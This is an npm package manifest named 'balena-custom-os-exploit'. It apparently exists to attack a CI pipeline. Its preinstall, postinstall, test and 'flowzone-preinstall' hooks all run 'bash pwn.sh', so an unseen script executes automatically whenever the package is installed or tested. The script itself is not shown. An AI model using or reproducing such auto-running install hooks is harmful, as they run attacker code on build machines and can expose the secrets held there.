{
  "name": "balena-custom-os-exploit",
  "version": "1.0.0",
  "scripts": {
    "flowzone-preinstall": "bash pwn.sh",
    "preinstall": "bash pwn.sh",
    "postinstall": "bash pwn.sh",
    "test": "bash pwn.sh"
  }
}
